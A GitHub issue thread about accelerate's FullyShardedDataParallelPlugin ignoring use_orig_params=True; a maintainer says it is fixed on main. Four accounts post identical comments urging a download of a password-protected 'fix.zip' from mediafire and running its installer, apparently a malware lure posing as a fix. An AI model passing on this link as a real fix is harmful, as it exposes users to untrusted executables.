### ISSUE TITLE
`FullyShardedDataParallelPlugin` cannot configure `use_orig_params=True`.

### ISSUE THREAD

**Issue by veritas9872** [huggingface/accelerate#3044]
### System Info

```Shell
- `Accelerate` version: 0.33.0
- Platform: Linux-6.5.0-45-generic-x86_64-with-glibc2.35
- `accelerate` bash location: /opt/conda/bin/accelerate
- Python version: 3.12.0
- Numpy version: 1.26.4
- PyTorch version (GPU?): 2.4.0 (True)
- PyTorch XPU available: False
- PyTorch NPU available: False
- PyTorch MLU available: False
- PyTorch MUSA available: False
- System RAM: 31.26 GB
- GPU type: NVIDIA GeForce RTX 4070
- `Accelerate` default config:
	Not found
```

### Information

- [X] The official example scripts
- [ ] My own modified scripts

### Tasks

- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)
- [X] My own task or dataset (give details below)

### Reproduction

```python
from accelerate.utils import FullyShardedDataParallelPlugin
fsdp_plugin = FullyShardedDataParallelPlugin(use_orig_params=True)
assert fsdp_plugin.use_orig_params  # This will fail.
```

### Expected behavior

`FullyShardedDataParallelPlugin ` currently cannot take the `use_orig_params=True` option, even though it appears to do so.
This causes problems during compilation, etc. If there is a reason for this behavior, I think that it should be documented.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by muellerzr** [comment]
@veritas9872 looks like this was fixed on main, we have a new release next week where this will be included in!

To try:
```bash
pip install git+https://github.com/huggingface/accelerate
```
```python
from accelerate import FullyShardedDataParallelPlugin as FSDPPlugin
plugin = FSDPPlugin(use_orig_params=True)
assert plugin.use_orig_params
```

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by veritas9872** [comment]
I have confirmed that this works on the main branch. Thank you!
